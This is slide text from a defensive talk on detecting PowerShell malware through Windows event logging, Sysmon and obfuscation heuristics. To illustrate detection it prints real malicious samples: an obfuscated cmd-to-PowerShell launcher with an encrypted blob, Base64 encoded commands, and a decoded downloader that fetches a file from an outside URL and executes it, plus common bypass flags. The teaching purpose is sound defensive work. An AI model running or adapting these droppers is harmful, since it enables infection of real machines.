You can detect PowerShell attacks

PowerShell post-exploitation,
the Empire has fallen,
You CAN detect
PowerShell exploitation
Michael Gough
MalwareArchaeology.com

Who am I
• Blue Team Defender Ninja, Malware Archaeologist, Logoholic
• I love “properly” configured logs – they tell us Who, What, Where,
When and hopefully How
Creator of
“Windows Logging Cheat Sheet”, “Windows File Auditing Cheat Sheet”
“Windows Registry Auditing Cheat Sheet”, “Windows Splunk Logging Cheat Sheet”
“Windows PowerShell Logging Cheat Sheet”, “Malware Management Framework”
NEW - “Windows HUMIO Logging Cheat Sheet”
• Co-Creator of “Log-MD” – Log Malicious Discovery Tool
– With @Boettcherpwned – Brakeing Down Security PodCast
• Co-host of “Brakeing Down Incident Response” podcast
• @HackerHurricane also my Blog

The Challenge

PowerShell Exploitation
• Malware loves to use PowerShell to download
and launch payloads
– They try and hide it too
• Red Teamers love PowerShell
– They love to hide too
– It is already built into the OS
• But they DO make noise and CAN be detected
– If you know how

So where do we start?

Check Your
Settings

What is set? What version?
• What version PowerShell you running?
• Is logging enabled?
• Are you using a PS v2 profile.ps1 to set
logging?
• What is your Execution Policy?
• How can you check?

Audit with LOG-MD

Audit with LOG-MD
• We give you a report

Enable Logging

PowerShell has Logs!
• You MUST enable them, not configured by default ;-(
• “Windows Logging Cheat Sheet” (CMD LINE)
• “Windows PowerShell Logging Cheat Sheet”
– Follow the guidance
– MalwareArchaeology.com/cheat-sheets
• Module Logging
• ScriptBlock Logging
• Pipeline Execution Logging
• Transcripts if you want
• Profile.ps1 for PS v2
– nop (no Profile) will bypass this ;-(

PS Event IDs – Windows PowerShell
www.eventsentry.com/blog/2018/01/powershell-p0wrh11-securing-powershell.html

PS Event IDs – PowerShell/Operational
• 4105 and 4106 too, but WAY too noisy to be of
any value
www.eventsentry.com/blog/2018/01/powershell-p0wrh11-securing-powershell.html

Typical Malware

What is Malware Using?
• LOTS of PowerShell
– In most malware we see
– Hearing it a lot in targeted attacks
– Living off the land, all the files are already there
– Just add script/commands and run
• PenTesters, The RED TEAM also loves them
• There are LOTS of PS post-exploit kits

Exploit Kits
• PowerSploit
• PowerShellEmpire
• EmpireProject
• BloodHound
• PSRecon
• PowerShell-Suite
• PowerTools
• Powershell-C2
• And more…

BLUE TEAM Baby
DETECTION !

4688 - Process Create
Security Log

Typical Malware launching PowerShell
1. User launches MS Word
1. Calls CMD.exe
1. Calls PowerShell and downloads dropper
1. Calls Malware
1. Calls 2nd copy of Malware

This PowerShell looks odd
• cmd jwaMLXnC iTahsHIpaITIFJCDLrOwoC XwSDfYdvV & %C^om^S^pEc% %C^om^S^pEc% /V /c set %LkOzPNSShSlqiXU%=HkMCjGoAjaAcJ&&set %var1%=p&&set
%var2%=ow&&set %AhUBjnMNLHEFDPI%=pRLBAwJEiiE&&set %var7%=!%var1%!&&set %vNQpMqIhkQoukIa%=cHwdrjXtIoaIBY&&set %var3%=er&&set %var8%=!%var2%!&&set
%var4%=s&&set %QSAiRAvRrPuhXMB%=ataDjzmFNO&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "(nEW-ObJECT
ManAGEMEnT.AuToMATIoN.PsCReDEntIAl ' '. (
'76492d1116743f0423413b16050a5345MgB8AGYAZgB2AFEAYgBtAEwAUQB5AEUAbgAwADkAUQA3AFkAUQBuAEcAVwBxAHcAPQA9AHwANAA1ADMAMQBiADkAMQAzADUAYwBiAD
EAZAA2ADMAMgA5AGIANABhADQAZQA1ADUAZgA1ADMAZQA4ADYAZQBiADgAYQAyAGUAZgA3ADYANABkAGUANQBjADMAMQA3AGQAZgA5ADcAZABjAGUANwA4AGMAZAA4AD
kAOAA0ADAAOQA4ADgANAA2AGUAYgA0ADAAMQA3ADUAYgA5AGMANwAwAGEANgA3ADIANQAyADEANgBmADQAZQA3ADcAZgA4ADMAMABkAGMAOABhAGQAOQA2AGIAZQAx
AGMAZQBhADYAMwAxAGUAMQAzAGEANQA0ADgAYwBmADMAMQA1ADgANAAyADEAOABiAGQAOABjADAAOAAzAGUAOQA3ADIAYwA4AGIAZgBhADAAMQA1ADkAYQBjAGMAN
ABlAGUAMABlAGUAMQBjADcAZQBhADMAZQBlAGEAMQBlADkANABkADYAOAAzAGEAYQA3ADcAMQBiADQAYwA5AGUANgBkAGMAYQBmADkANAA5ADYAMgBiADYAYwBkADMA
OQA3ADEAZgA1AGYAYwBjADAAZQBiAGQAOAAzADQAOAA4AGMAZQA3AGMAZABjAGIAYQBiAGYAZAA4ADgAOQBiADgAOAAyADcANwAwADcANAA0ADIAZAAyADMAZQAwADMAO
QBlADUANQA1ADUAMQBiADUAZgAxADgAOAA1ADcANgA5ADMANABkADkANAAzADUANwAzADgAOQA3ADAAMABiAGUAMwBiAGYAMwA1ADEAMQBiAGEANgBiADYAYgAwADUA
NQAxAGUANAA3ADUAMgBjAGUANAA4ADgAYQBiADYAMQA3ADUAOQBkADEAZQA1ADUANAA3ADUANwA2ADYAOABlADgANwBmAGMAMQAzADQANwBmAGEANgA4AGUAMwA0
ADAANwBmADAANQBiADkANwAyAGEANAA3ADIAZAA3AGIAMgAxADYAYwBmADAAMwA0ADYAYwA2ADYAYgAxADkAMQA3AGUAYgA0ADkAOABiADUANgAyADgAMQBmADQAYgA
2ADYAMQAyAGMAOQAxAGEAOQA5AGEANQBiADcAYgBhAGQAYgA1ADgAZQBiAGMAZgA4AGEAMQA2ADAANgAzADkAMwBjAGIAMgA4ADcANwA3ADIANAAxADcANgAwADEAZQA2
AGQAMwBiAGYAMgBhADEAMQAxADMAYQAyAGUAOQBmADIAYgA4AGUAZQA0ADUAMwBmAGYAYwAzAGIAMABiAGMAYwAyADYANQBmADcAMgAzAGUAYgBmAGQAYgA1ADQA
OAAwADEANAA3ADcAZgAyAGQAZAA4AGUAYgBhAGYAOQA1ADMAMgA5AGEANgA2ADQANwAwAGUANwAzADMAZQBlADgAMgBjAGEAYwAzAGQAOQBhADQAYQA4ADAAMgAwA
GQAOABkAGMANwAxADAANQA5ADEAYwBkAGIAYgA4ADMANgAwADYAZQBkAGYAMAA4ADgAMwBmADUANABhAGYAOABmADgANQAyADAAMQA4ADYAYwAxADMAMQBiADkAZ
gA4AGIAZQAzADQAZgA5AGYAMQBkADcAOQA4AGIAZgAxADcAOAAxADMAOAA5ADEANQAxAGQAYQBjADIAYwAxADcAMAAwADEANwAzADgAMQA4ADgAMgA0ADMAMwBmADMA
ZQBkADUAMAA4ADYAYQBiADIAYgAxAGEAYgA3ADMAMAAxADAAMABhADIAYwA1AGYAZgA0ADkAYgBiADkANwBjAGMANwBkADgAMQAzADUAMAAxADAAZQBmAGEAMQAyADQA
OQBhAGMAMQBkAGYAZgBjAGEAZgBiADYAMAA2ADUAOABhAGYANwAzADEAOQAzADEAZQBhADUANwA4AGMAYQBmADEANwAxADEAOAA1ADgANgA0ADkANABjADYAMABkAGU
AYgA2AGUAMQBlAGIAMgA5ADkAYQAwADAANgA1ADAANgAxADYANgBkADUAYwA2AGIAYgAyAGYAMAA0ADYAYgBlADAANwA1AGQAOQAxADcAOABmAGMAOAA2ADEAMQA4ADc
AMAA3ADcAYwA0AGUAYgA2AGIAOQAyADMAYgBhADgAMQBlADAAOQA3ADgANgBkAGIAYwA4ADEAMgA2ADQAZgA5AGMAOQAwAGYAZAAwADQAYQBkAGUAOAA1ADkAZQBlAD
UANwA2ADgANAA4ADkANQBiADgAMgAzADMAMgAwAGUAYgA1ADMANQBiAGUANAA5AGMAYgA4ADAAYQA4AGQANABiAGEAMwA1ADQAMwBhADAAMQA3AGYAYwAwADMAY
wA3ADEAYwAyADQAZQBlAGMAOQBmADkAMgA0AGMAYQAyAGMANgA2AGQAOABlADQAOAA5ADUAMwBjADQAZABkADIAZQA2ADQAYQAzADgANAAxADcAOABmAGMAMABhAG
QANgAyADIANwA4ADQAYQA2AGYANABiADgAMQA4ADcAYgAwADgAZABmADgAMQA0AGMAYwBhADcAYgBlAGEAOQAyADcAMgBiADcAOAAxADkAMQBiADcAZAAwADUANgA0AG
QAMwAzAGYAMQBjADgAOQBiAGUAZQA3ADgAZAAxAGIANwA1AGMAMQA2ADIAOQAyADMAMAA3ADcAZgA4ADEAZAAyADQAZABkAGUANwBlAGYANAA1ADAANABkADUAMgAxA
DEANgAxADgAZQBjAGUAMwBlADUAMQAyADgANABlADEANwA4ADYAZABlADIAMgA5ADAAYgAwADYANAA2ADAAZQA2ADIAMQBlADQAYwA5ADAAZAA0ADgAOAA4ADgANgA5ADc
ANAA2ADMAYwBjADIAOABlADYAYwBiADYAMwA2AGUAMAAxADEAZgA2AGMAYgAzAGUANwBjADIAMABmADcANgAwADgAMgA4AGYAZAA5ADgAOQBjADMAZgBiAGUAYgA4ADkA
MQA4AGIANwA2ADYAYgBhAGMAMQA4ADUAMAAwADMAMQAyADEAYQA2ADUAMQBhADQANABlADAAMQA5AGYAZQAxADcAZgBjADIANQBjADgANgA3ADUAOQA0ADIANwA4AD
cAYgA1ADUAYgA0ADAANAA0ADkAMgBhAGMAZQBmAGEAZAAwAGEAZQBjAGIAMQBkAGEAMwAzADEAMABlADMAOQAyADAAZABkADMAMQA1ADQAMgA4ADEAMABlADQAZgAx
AGIAZAAyADkAZgA2ADIAMwBkADAAMgBjAGQAYgBlADYAMgBkADEAYwBjADMAMwBhADUANgA2AGIAMQA1ADMAYwA3ADMANQA4AGEAYwAyADkAOAA3AGUANQBmAGYAOAA
3ADMAZQA1AGMAOQBkAGQAYwBiADcAMQA1ADAANwAwAGUAYwAwAGIANAA3ADQANwAwADMAMAA2ADEAOQAxADcAOAA0AGUANQA4ADgANgBlADAANQA3AGQANwAxAGI
ANAAyAGQANgA2ADUAOQA0ADkAMAA1ADkANQBkADQAZgBhAGUANAAzADUANQA4ADQAMwBkAGIAMwBhAGQAZgA5ADEAYgA3ADcAMABhADMAYQA2AGUAYQAwADkANwAx
AGMAYQA3AGIANAAwADkANgA2AGYAMQA1ADcANQA1AGMAYQA3AGYAMQA2AGIANgAyADAAMAA4ADEAYgAwADcAZQBhADUAYQBjAGQAOQBhADUAZgAzAGMANQBiADIANQA
yADQAOAA2ADgANwA0ADgANgAyADIAYwAxADQAYgBlADgAZAA3ADUANAA5AGQAZQA5ADkAMAAwADkANwBjADcAMABkAGQAMgBiADcAMABiADEAYwBjADAANgBkADIAYgA4A
DYAMQAyADUAMgA2ADgAMAA0AGEAYQBlAGMANAAxADUAZQAxADEAOAAzADgAZgA0ADIAMgA3ADEAYQBiAGYAOABhADAAMgBiADkANwA0ADMAOQAwAGQAMgA2ADMAYwB
kADYAYQA4ADAANgA1ADgAMgBlAGEANwA3AGQAMQAwADQAYQBhAGQAOABlADgANQBlAGMAZQA1ADAAZABkAGIANQAwAGEAYgBmAGMAOAAzADAAMwBlADUAMgBiADYAY
wBiAGMAMwBjADAAZAAzADEAZQBiAGMAYwAxAGMAMgBjADAAMwAzADEAMgAzAGYAYwBkAGMANgA1AGMANwA0AGUANQA4ADYAMQA5AGYAZAA0ADgAMQA3AGUANQA4A
DUANwBlADgAZQAxAGUAOQA1AGMAZgBjAGQAMwBkADMAZgBmADgAMwBjADEAMAA4ADgANAA5ADMAYwBmADAAMAAzADUAYwBkADEAZAAxADkAMAAxADYANgA4ADgAMQ
A5AGIAOQBiADkAMwAzADUAMgA4ADAAOAAxAGQAZQBkAGEAYwA0ADIAMwBiADUANAAwADQAMgAzADMANwBlAGEAZQA4ADgAMgAwADEAYQAyAGQAMAA2AGYAZQA3ADYA
YQAwADEANQBjAGUAZQA5ADAAMABkAGMAMAA2AGIAZQBhADAANwBiADQAMQBjADAAZQAyAGUAOQAyADAAZgAyAGUAYgBmADQANAA0ADIAZAA2AGYAOAAwAGUAYQA3AD
kANwA1ADcAOABjADUANgA0ADAANgAwAGYAYgA0ADUANwBjAGYAOAAxADUAOAA1AGUAZAA5ADEANABjADAAMAAyADcAOAA5ADIAZQBiAGQAMABlADUAMAA2ADkAZAAyADc
AMwAxAGEAOAA4ADcAZQA1AGIAMAAzADcAYgBiAGQAMABjAGYAOAA0ADQAYQAyADEANwA0ADAAYgA2AGMAMgA4ADMAOQAxAGIAOQBmADMANgBlADQAMABjADAAMQA1A
DYAYgA4ADQAMwA5AGMANwBhADYANABhAGUAYgA3ADUAZgBmAGYAMgBhADAAYQBiAGQAZQA3ADUAZgBiADMAMQA4ADcAMQA5AGYAZAAyADkAZAAxAGMANQA3AGEAYgA
wADcANAA2AGUAMQA1ADEAYQBlAGMAZgAwAGMAZAA0ADQAYgAwAGQAMwA2ADAAMQBhAGEAYQA4ADkAZgBhADEAMwBjADAANQA3ADgANgAyAGQAMQAxAGIAZgA2AGMA
NQBhADkAOABhADIAOAA0AGEANgBhADIAYgBkAGYAYQBhAGUANwA0AGYAOQBjADAAZABkADMAYwBiADAAZgBjAGIAMgAyADUAMgBiADEAZgA1ADcAMQAxAGEAYwAxAGMANw
A3ADIANQAxADgAOAAxAGUAYQAxAGQAZQBkADAAMQA3ADEAZAAwADcANQA0ADcAMAAxADIANgAzADcAMgBiADcANwBkADgAMQAyAGQAYgBiAGEAZAA4ADEAZgAzADgAZABk
ADcAZAA2ADcANQA5AGYANwBiADMA'|CONVerttO-SecuresTrInG -ke 150.105.213.121.221.126.137.121.68.30.46.202.28.13.28.138 )
).gETNEtwORkCrEdeNTIaL().pasSwoRD|.((vAriabLE '*mdR*').NAME[3.11.2]-JOin'')

This PowerShell looks odd
• cmd jwaMLXnC iTahsHIpaITIFJCDLrOwoC XwSDfYdvV &
%C^om^S^pEc% %C^om^S^pEc% /V /c set
%LkOzPNSShSlqiXU%=HkMCjGoAjaAcJ&&set %var1%=p&&set
%var2%=ow&&set %AhUBjnMNLHEFDPI%=pRLBAwJEiiE&&set
%var7%=!%var1%!&&set %vNQpMqIhkQoukIa%=cHwdrjXtIoaIBY&&set
%var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set
%QSAiRAvRrPuhXMB%=ataDjzmFNO&&set %var5%=he&&set
%var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%!
"(nEW-ObJECT ManAGEMEnT.AuToMATIoN.PsCReDEntIAl ' '. (
'76492d1116743f0423413b16050a5345MgB8AGYAZgB2AFEAYgBtAEwAU
QB5AEUAbgAwADkAUQA3AFkAUQBuAEcAVwBxAHcAPQA9AHwANAA1
ADMAMQBiADkAMQAzADUAYwBiAD
– 42 more lines of Script Block code
• ADcAZAA2ADcANQA5AGYANwBiADMA'|CONVerttO-SecuresTrInG -ke
150.105.213.121.221.126.137.121.68.30.46.202.28.13.28.138 )
).gETNEtwORkCrEdeNTIaL().pasSwoRD|.((vAriabLE
'*mdR*').NAME[3.11.2]-JOin'')

Did that look normal?
• 4688 will show you the Process execution
– What called what
• What called PowerShell, and the parents
above
– Word > CMD > PowerShell = Always BAD
• What did PowerShell logging catch?
– That big blob looked interesting

4688 – PowerShell
Bypass
Security Log

PowerShell Bypasses
• -W Hidden (Hide the window YOU see)
• -NoP –sta –NonI –w hidden (no Profile, Hidden, Non-Interactive)

They do this to hide what you see
• Bypass
• Hidden Window

They do this to hide what you see
• 4688 will capture this behavior
– Enabling Process Command Line is key
• Bypassing stops the profile from loading in
case there is any logging set (v2), hide the
window, and ignore any execution policies
• YAY Microsoft.. Allows built-in bypasses
• LOTS of way to spell the bypasses

PowerShell Logs show it too
• Windows PS logs (v2-v5) 400, 600
• Windows PS 500 IF command line enabled
– But –NOP will not load profile.ps1 causing this to
be basically worthless
– And WHY upgrading to PowerShell v5 is so
important
• PowerShell/Operational 800
– Some versions of PowerShell (Pipeline Execution)

Security Log - 4688
PowerShell
Web Calls

Fetch !!!
• The malicious payload must phone home to get
the dropper
• System.Net.WebClient
• DownloadString and/or http
• -Enc or Encoded
• There are lots of ways to spell PS commands ;-(

Fetch !!!
• 4688 will show them IF in the clear
• Sometimes obfuscated

Base64 Encoded
• New way to hide from the “Process Command Line” 4688 event
– No bypass words to check for… Silly hackers… It is still easy to spot
• POWeRshEll -enCodedCOMmaNd
– ZgB1AG4AYwB0AGkAbwBuACAAaQBlAFcATABkAFcAQQB3AHQASABpAEYAZABmAEMAUwBPAHMATQBiAHM
AdwBzAGUAZgAgACgAIAAkAFgARABKAFEAaABXAGYAcQBWAHUAWABvAFIASQAgACwAIAAkAHMAYgBUAGYA
TwBUAHQAbQBKAHMAaQBFAFkAVgBZAHgAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AH
MAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpA
GwAZQAoACAAJABYAEQASgBRAGgAVwBmAHEAVgB1AFgAbwBSAEkAIAAsACAAJABzAGIAVABmAE8AVAB0AG
0ASgBzAGkARQBZAFYAWQB4ACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZ
QBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIA
AkAHMAYgBUAGYATwBUAHQAbQBKAHMAaQBFAFkAVgBZAHgAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgB
rAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEgAWQBs
AFoAYgBVAFcAZwBGAHYAUABZAGkAZwA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAn
AFwASwBkAG0ATwBiAFEAWgBWAEIAeQBRAHAAdgBCAFMAUQBpAHoAcAAuAGUAeABlACcAOwANAAoAaQB
lAFcATABkAFcAQQB3AHQASABpAEYAZABmAEMAUwBPAHMATQBiAHMAdwBzAGUAZgAgACcAaAB0AHQAcA
BzADoALwAvAGMAbwBtAGYAeQAuAG0AbwBlAC8AeQBiAG4AdwBpAGYALgBqAHAAZwAnACAAJABIAFkAbAB
aAGIAVQBXAGcARgB2AFAAWQBpAGcAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=
• Base64 does not always need the =

Manual Translation
• On a website

PowerShell Log - 4104
Module Logging

Translated… Fetch
• function ieWLdWAwtHiFdfCSOsMbswsef ( $XDJQhWfqVuXoRI , $sbTfOTtmJsiEYVYx
){(New-Object System.Net.WebClient).DownloadFile( $XDJQhWfqVuXoRI ,
$sbTfOTtmJsiEYVYx );(New-Object -com Shell.Application).ShellExecute(
$sbTfOTtmJsiEYVYx ); }
• try{
• kill -processname EXCEL;
• $HYlZbUWgFvPYig=$env:USERPROFILE+'KdmObQZVByQpvBSQizp.exe';
• ieWLdWAwtHiFdfCSOsMbswsef 'https://comfy.moe/ybnwif.jpg'
$HYlZbUWgFvPYig;
• }catch{}
• Catch it as a PS 4104, not a Process Create 4688

PowerShell Decodes for you !!!
• 4104 event will decode any –Encoded, Base64
blobs
• Module Load

PS Base 64 blob
POWeRshEll -enCodedCOMmaNd
ZgB1AG4AYwB0AGkAbwBuACAAVgBiAGYASQBqAGEAYwBwAE8AawBwAFIAbABTAEQAc
ABPAFcAeABoAFoAZwAgACgAIAAkAEsAcQBCAGQAQQBUAGoARABMAGsAZQB6AE0AV
wBPAFMAZwAgACwAIAAkAGMATABUAHcARQBvAGYAbQBBAE4AaQBVAHQAYQB4AEQ
AcABSAHAASABHAFoASQBHAEsAWQBGAG0AIAApAHsAKABOAGUAdwAtAE8AYgBqAG
UAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0A
CkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABLAHEAQgBkAEEAVABq
AEQATABrAGUAegBNAFcATwBTAGcAIAAsACAAJABjAEwAVAB3AEUAbwBmAG0AQQBO
AGkAVQB0AGEAeABEAHAAUgBwAEgARwBaAEkARwBLAFkARgBtACAAKQA7ACgATgBlA
HcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZQBsAGwALgBBAHAAcABsAG
kAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIAAkAG
MATABUAHcARQBvAGYAbQBBAE4AaQBVAHQAYQB4AEQAcABSAHAASABHAFoASQBHA
EsAWQBGAG0AIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgBrAGkAbABsACAALQBwAH
IAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEcAbABOAEQ
AYgBvAGcASgB2AGUAeABNAGIASwBoAGUAPQAkAGUAbgB2ADoAVQBTAEUAUgBQAFI
ATwBGAEkATABFACsAJwBcAHUAYgBQAEQAbgBJAEwAbwBkAHcAWABTAFEAWQBpAFA
AWABlAGMALgBlAHgAZQAnADsADQAKAFYAYgBmAEkAagBhAGMAcABPAGsAcABSAGw
AUwBEAHAATwBXAHgAaABaAGcAIAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbQBmAH
kALgBtAG8AZQAvAHUAdQBvAG8AdgBxAC4AagBwAGcAJwAgACQARwBsAE4ARABiAG8
AZwBKAHYAZQB4AE0AYgBLAGgAZQA7AA0ACgANAAoAfQBjAGEAdABjAGgAewB9AA==

4104 Decodes Base64 blobs
• Is suddenly more readable

Security Log – 4688
PowerShell Log – 4104
Windows PowerShell Log - 400
Obfuscation

Fetch !!!
• They will try to hide or obfuscate their behavior to make
it hard to read
• To me, this makes no difference, except I can’t easily
understand what they are doing
• They will add plus“+” to add/connect variables
• They will use ticks ‘ to break word checks
• They will use dollar $ or percent % to designate variables
• So look for the “Odd Characters” that indicate
obfuscation!
– You can thank Daniel Bohannon for this shtuff
– Or I should say $Daniel #B’o^h^a^n^n^o’n#

Obfuscation – Odd stuff - 4688
• Becomes obvious very quickly.. This is BAD
• Count of characters are very telling once isolated
or extracted from the blob
Ticks
Plus +

Obfuscation – Odd stuff - 4104
• Now you can’t look for words, so adapt
Lots of special characters,
some normal for PS

Even older PowerShell v2 Event ID 400
• Look for odd characters

4104 - PowerShell
Script Block Logging
Microsoft-Windows-PowerShell/Operational Log

Script Blocks are labeled

Then you will see this in the logs
• It is not translated, just recorded
• But they are LARGE
– You can trigger on say > 1000 characters
– You can see this one will also trigger Obfuscation

This is a normal Script Block

Do they look the same?
Readable
NOT Readable
Obfuscated

And they obfuscate
Ticks
Plus +

4104 - PowerShell
Module Logging
Microsoft-Windows-PowerShell/Operational Log

WARNING !!!!
• PowerShell does have a WARNING if
something violates a rule or is odd
• Trigger Alerts on these too
• 4104

WARNING !!!!
• The Remote Command along with all this… = BAD
Just look.. It’s NOT normal

WARNING !!!!
• And the raw log

WARNING !!!!
• And you can see translation in Event ID 4100
Translated

WARNING !!!!
• And you can see translation in Event ID 4100

4100 – Executing Pipeline
• Can see some translation occurring
I can read this
NOT this

PS v2 - 500 Events
• Windows PowerShell
This Base64 has
2 =

PS v2 200 Events
• Command Health

Whitelisting
PowerShell
In the Logs

Filtering out the good, to find the bad
• PLEASE put a Mark/Sign/Secret Key in your scripts

Code your PowerShell for exclusion
• Make the scripts excludable on obvious things
YOU or your company does or knows
• The path is awesome
– All scripts excluded by path alone
• Names, Secret Code, Key
– Have your scripts contain something only you
know that is a ‘secret key’ to exclude by
• Or.. Sign your PS scripts

Once you create
these queries

Create Email Alerts
• Trigger on PS launching
• Tweak and filter out known good
– Get your developers to mark their code!!

PowerShell Log Goodness
• Enable the logs per the Cheat Sheets
• PS v2 Logs (even if you have PS v5)
– Collect Event ID 200, 400, 500 and 800
– Windows PowerShell
• PS v5 Logs
– Collect 4100, 4104
– Microsoft-Windows-PowerShell/Operational
• Windows Logs
– Collect 4688 – WITH Process Command Line

Security Log
Event ID - 4688
• PS executed
• PS Bypass executed
• PS Suspicious buzzwords
• PS Count Obfuscation Characters (‘ + $ % ;)
– There are others & #, etc. Tweak as needed
• You can look for large Scripts Blocks and
Base64, but use the PS logs for this

PowerShell v2
• 200 – Command Health – WARNING, will give
you some translation
• 400 – Engine Lifecycle – What executed
• 500 – Command Lifecycle - What executed
and the command line if using profile.ps1
– and if “No Profile” (-nop) is not bypassed

PowerShell v2
Event IDs - 200 and/or 400
• PS Web Call
• PS Count Obfuscation Chars (‘ + $ % ;)
• PS ScriptBlock size (> 1000)
• PS Base64 blocks
• PS WARNINGS

PowerShell v5
PowerShell/Operational Log
• 4100/4103 – Executing Pipeline - WARNING
• 4104 – Execute a Remote Command –
WARNING and Verbose
• No Obfuscation here, stripped out as it is
executed, so you get clean code
• That big Base64 blob… now it is readable

PowerShell v5
Event IDs - 4100 and/or 4104
• PS Web Call
• PS Suspicious Commands (buzzwords)
• PS Count Obfuscation Chars (‘ + $ % ;)
• PS ScriptBlock by size (> 1000)
• PS Base64 blocks
• PS WARNINGS

PowerShell v5
Windows PowerShell Log
• 800 – Pipeline Execution – What executed
– Focus on the HostApplication field

Sysmon
• You can catch Not-PowerShell PowerShell
execution
• Event ID 7 – Module loads
– Look for Process that is calling
System.Management.* DLLs
• And all the other cool stuff Sysmon collects

How do I hunt for PS?
• Log Management obviously
• What if you do not have fancy Log
Management?

How do I hunt for PS?
• Without Log Management?

Summary
• LOG-MD will check your system and report
• Upgrade to PS v5 – NOW !
• Enable PowerShell logging !
• Use the “Windows PowerShell Logging Cheat Sheet”
on what to set
• Create Reports and Alerts for the items discussed
• Maybe add Sysmon on a few systems
• Use the “Windows Splunk and Humio Logging Cheat
Sheets” for some examples of what was discussed
• Send us your improvements and tweaks !!!!
• But START LOGGING POWERSHELL !!!!

Resources
LOG-MD.COM
• Websites
– Log-MD.com The tool
• The “Windows PowerShell Logging Cheat
Sheet(s)”
– MalwareArchaeology.com

Resources
• https://www.invincea.com/2017/03/powershell-exploit-analyzed-line-by-line/
List of Tools
• https://github.com/emilyanncr/Windows-Post-Exploitation
Obfuscation
• http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-
usage-guide
• http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-
usage-guide-part-2
• https://github.com/danielbohannon/Revoke-Obfuscation
• https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-
obfuscation-report.pdf
• https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-
wild.html
Metasploit Check Logging module
• https://github.com/darkoperator/Meterpreter-Scripts/tree/master/scripts

Questions?
LOG-MD.COM
You can find us at:
• Log-MD.com
• @HackerHurricane
• HackerHurricane.com (blog)
• MalwareArchaeology.com – Cheat Sheets
• Listen to the “Brakeing Down Incident Response”
Podcast
– BDIRPodcast.com

You can detect PowerShell attacks

More Related Content

What's hot

Similar to You can detect PowerShell attacks

More from Michael Gough

Recently uploaded

In this document

You can detect PowerShell attacks